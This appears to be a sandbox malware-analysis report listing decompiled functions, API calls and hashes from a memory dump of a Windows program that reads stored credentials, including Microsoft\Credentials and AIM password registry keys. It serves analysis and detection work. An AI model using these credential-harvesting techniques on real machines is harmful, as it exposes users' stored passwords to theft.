                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
                                • String ID: Microsoft\Credentials
                                • API String ID: 3139367858-3148402405
                                • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411EC1, Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileString$Write
                                • String ID:
                                • API String ID: 2948465352-0
                                • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408490, Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E00408490(intOrPtr _a4, int _a8, wchar_t* _a12) {
				void* _v8;
				char _v12;
				void* _v35;
				int _v36;
				int _v250;
				char _v252;
				void _v291;
				int _v292;
				void* __ebx;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				int _t39;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t47;
				void* _t48;
				int _t57;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr _t70;
				int* _t71;
				struct HINSTANCE__** _t74;
				intOrPtr* _t75;
				void* _t76;

				_t74 = _a4 + 0x78;
				E00404D18(_t74);
				_t37 =  *((intOrPtr*)(_t74 + 0xc));
				_t57 = 0;
				if(_t37 == 0) {
					_t38 = 0;
				} else {
					_t38 =  *_t37(_a8, 0x8004, 0, 0,  &_v8); // executed
				}
				if(_t38 != _t57) {
					_t39 = wcslen(_a12);
					_t7 = _t39 + 2; // 0x2
					_t66 = _t39 + _t7;
					_a8 = _v8;
					E00404D18(_t74);
					_t42 =  *((intOrPtr*)(_t74 + 0x14));
					if(_t42 == _t57) {
						_t43 = 0;
					} else {
						_t43 =  *_t42(_a8, _a12, _t66, _t57);
					}
					if(_t43 == _t57) {
						L15:
						_t67 = _v8;
						_t44 = E00404D18(_t74);
						_t75 =  *((intOrPtr*)(_t74 + 0x18));
						if(_t75 != _t57) {
							_t44 =  *_t75(_t67);
						}
						return _t44;
					} else {
						_v36 = _t57;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t70 = _v8;
						_v12 = 0x14;
						E00404D18(_t74);
						_t47 =  *((intOrPtr*)(_t74 + 0x10));
						if(_t47 == _t57) {
							_t48 = 0;
						} else {
							_t48 =  *_t47(_t70, 2,  &_v36,  &_v12, _t57);
						}
						if(_t48 != _t57) {
							_v292 = _t57;
							memset( &_v291, _t57, 0xff);
							_a8 = _t57;
							_t64 = 0;
							_t71 =  &_v292;
							do {
								_a8 = _a8 + ( *(_t76 + _t64 - 0x20) & 0x000000ff);
								E004081DA(_t71,  *(_t76 + _t64 - 0x20) & 0x000000ff);
								_t64 = _t64 + 1;
								_t71 = _t71 + 2;
							} while (_t64 < 0x14);
							E004081DA( &_v252, _a8);
							_v250 = _t57;
							E004083D0(_a4,  &_v292, _a12);
							_t57 = 0;
						}
						goto L15;
					}
				}
				return _t38;
			}






























                                0x0040849e
                                0x004084a1
                                0x004084a6
                                0x004084a9
                                0x004084ad
                                0x004084c1
                                0x004084af
                                0x004084bd
                                0x004084bd
                                0x004084c5
                                0x004084cf
                                0x004084d4
                                0x004084d4
                                0x004084dc
                                0x004084df
                                0x004084e4
                                0x004084e9
                                0x004084f7
                                0x004084eb
                                0x004084f3
                                0x004084f3
                                0x004084fb
                                0x004085a0
                                0x004085a0
                                0x004085a3
                                0x004085a8
                                0x004085ad
                                0x004085b0
                                0x004085b0
                                0x00000000
                                0x00408501
                                0x00408501
                                0x00408509
                                0x0040850a
                                0x0040850b
                                0x0040850c
                                0x0040850d
                                0x0040850e
                                0x00408511
                                0x00408518
                                0x0040851d
                                0x00408522
                                0x00408534
                                0x00408524
                                0x00408530
                                0x00408530
                                0x00408538
                                0x00408547
                                0x0040854d
                                0x00408555
                                0x00408558
                                0x0040855a
                                0x00408560
                                0x00408565
                                0x0040856b
                                0x00408570
                                0x00408572
                                0x00408573
                                0x00408581
                                0x0040858f
                                0x00408599
                                0x0040859e
                                0x0040859e
                                0x00000000
                                0x00408538
                                0x004084fb
                                0x004085b6

                                APIs
                                  • Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                • wcslen.MSVCRT ref: 004084CF
                                • memset.MSVCRT ref: 0040854D
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$LibraryLoadmemsetwcslen
                                • String ID:
                                • API String ID: 1960736289-0
                                • Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                • Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
                                • Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                • Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D9B9, Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E0040D9B9(intOrPtr* __esi) {
				intOrPtr _v8;
				int _v16;
				int _v20;
				char _v276;
				char _v532;
				void _v1555;
				char _v1556;
				void _v2579;
				char _v2580;
				void* __ebx;
				void* __edi;
				char* _t26;

				_v8 = 1;
				_v1556 = 0;
				memset( &_v1555, 0, 0x3ff);
				_v2580 = 0;
				memset( &_v2579, 0, 0x3ff);
				_t26 =  &_v1556;
				0x413735(_t26,  &_v2580); // executed
				if(_t26 != 0) {
					_v532 = 0;
					_v276 = 0;
					_v20 = 0;
					_v16 = 0;
					E00406958(0xff,  &_v532,  &_v1556);
					E00406958(0xff,  &_v276,  &_v2580);
					_push( &_v532);
					_v16 = 4;
					_v20 = 7;
					_v8 =  *((intOrPtr*)( *__esi))();
				}
				return _v8;
			}















                                0x0040d9d4
                                0x0040d9db
                                0x0040d9e1
                                0x0040d9f2
                                0x0040d9f8
                                0x0040da07
                                0x0040da0e
                                0x0040da15
                                0x0040da1d
                                0x0040da23
                                0x0040da29
                                0x0040da2c
                                0x0040da3b
                                0x0040da4e
                                0x0040da5c
                                0x0040da5f
                                0x0040da66
                                0x0040da6f
                                0x0040da6f
                                0x0040da78

                                APIs
                                • memset.MSVCRT ref: 0040D9E1
                                • memset.MSVCRT ref: 0040D9F8
                                  • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                  • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$Closememcpystrlen
                                • String ID:
                                • API String ID: 1317463181-0
                                • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F9A0, Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                  • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                  • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00406D4F
                                • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FileTime$CloseCompareHandlememset
                                • String ID:
                                • API String ID: 3621460190-0
                                • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411D82, Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue
                                • String ID:
                                • API String ID: 3660427363-0
                                • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411D37, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                  • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                  • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                  • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406ED6, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00406ED6(void* __ecx, intOrPtr* __esi, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t9;

				_v8 = _v8 & 0x00000000;
				_t9 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(__esi != 0) {
					 *((intOrPtr*)(__esi)) = _v8;
					return _t9;
				}
				return _t9;
			}





                                0x00406eda
                                0x00406eed
                                0x00406ef5
                                0x00406efa
                                0x00000000
                                0x00406efa
                                0x00406efd

                                APIs
                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
                                • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407A7A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                • Instruction ID: d064f037d8cc498e3967daff6ff593c2326981cc2c3d102c7782d5cd9755b432
                                • Opcode Fuzzy Hash: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                • Instruction Fuzzy Hash: A5C00272A14B018FE7709E55D4057A6B3E4AF1073BF618C1DD4D591581D77CE5848E14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004067D3, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E004067D3(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                0x004067e5
                                0x004067eb

                                APIs
                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004067BA, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E004067BA(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				return _t3;
			}




                                0x004067cc
                                0x004067d2

                                APIs
                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404CE0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00404CE0(signed int* __esi) {
				struct HINSTANCE__* _t3;
				int _t4;

				_t3 =  *__esi;
				__esi[1] = __esi[1] & 0x00000000;
				if(_t3 != 0) {
					_t4 = FreeLibrary(_t3); // executed
					 *__esi =  *__esi & 0x00000000;
					return _t4;
				}
				return _t3;
			}





                                0x00404ce0
                                0x00404ce2
                                0x00404ce8
                                0x00404ceb
                                0x00404cf1
                                0x00000000
                                0x00404cf1
                                0x00404cf4

                                APIs
                                • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412111, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407930, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00407930(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                0x00407930
                                0x00407937
                                0x0040793a
                                0x00407940
                                0x00000000
                                0x00407940
                                0x00407943

                                APIs
                                • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411D68, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004069D3, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E004069D3(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                0x004069d7
                                0x004069e7

                                APIs
                                • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00412768, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.MSVCRT ref: 00412B87
                                • _strncoll.MSVCRT ref: 00412B97
                                • memcpy.MSVCRT ref: 00412C13
                                • atoi.MSVCRT ref: 00412C24
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                • API String ID: 1864335961-3210201812
                                • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
                                • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004117B1, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 004117DE
                                • GetDlgItem.USER32(?,000003E8), ref: 004117EA
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
                                • GetWindowLongA.USER32(?,000000F0), ref: 00411805
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
                                • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
                                • GetWindowRect.USER32(00000000,?), ref: 0041182C
                                • GetWindowRect.USER32(?,?), ref: 00411837
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
                                • GetDC.USER32 ref: 00411892
                                • strlen.MSVCRT ref: 004118D2
                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
                                • ReleaseDC.USER32(?,?), ref: 00411930
                                • sprintf.MSVCRT ref: 004119F0
                                • SetWindowTextA.USER32(?,?), ref: 00411A04
                                • SetWindowTextA.USER32(?,00000000), ref: 00411A22
                                • GetDlgItem.USER32(?,00000001), ref: 00411A58
                                • GetWindowRect.USER32(00000000,?), ref: 00411A68
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
                                • GetClientRect.USER32(?,?), ref: 00411A8D
                                • GetWindowRect.USER32(?,?), ref: 00411A97
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
                                • GetClientRect.USER32(?,?), ref: 00411AE7
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
